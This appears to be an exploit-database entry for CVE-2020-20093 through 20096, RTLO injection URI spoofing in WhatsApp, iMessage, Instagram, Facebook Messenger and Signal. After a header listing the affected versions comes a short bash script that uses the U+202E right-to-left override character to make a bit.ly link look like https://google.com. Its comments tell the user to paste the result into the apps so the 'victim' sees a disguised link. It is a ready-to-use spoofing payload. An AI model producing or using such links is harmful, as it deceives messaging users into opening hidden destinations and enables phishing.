# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096
# Date: 24/03/2022
# Exploit Authors: zadewg & Sick Codes
# Vendor Homepage: https://www.meta.com
# Vendor Homepage: https://www.instagram.com
# Vendor Homepage: https://www.apple.com
# Vendor Homepage: https://www.signal.org
# Tested on: Whatsapp iOS
# Version  2.19.80 and below
# Tested on: Whatsapp Android 
# Version  2.19.222 and below
# Tested on: Instagram iOS
# Version: 106.0 and below
# Tested on: Instagram iOS Android 107.0.0.11
# Version: 107.0.0.11 and below
# Tested on: iMessage (Messages app)
# Version: iOS 14.3 and below
# Tested on: Facebook Messenger app iOS
# Version: 227.0 and below
# Tested on: Facebook Messenger app Android 
# Version: 228.1.0.10.116 and below
# Tested on: Signal
# Version: 5.33.0.25 and below
# CVE: CVE-2020-20093
# CVE: CVE-2020-20094
# CVE: CVE-2020-20095
# CVE: CVE-2020-20096


#!/bin/bash
# Author:       sickcodes
# Contact:      https://twitter.com/sickcodes https://github.com/sickcodes
# Copyright:    sickcodes (C) 2022
# License:      GPLv3+

# References:   https://github.com/zadewg/RIUS
#               https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh
#               https://sick.codes/sick-2022-40


APPEAR_AS='https://google.com'


DESTINATION='bit.ly/3ixIRwm'


printf "\n\n${APPEAR_AS}/\u202E${DESTINATION}\n\n"


# copy paste into any of the above apps.
# victim will see a surreptitious link


# works on latest Signal (unpatched)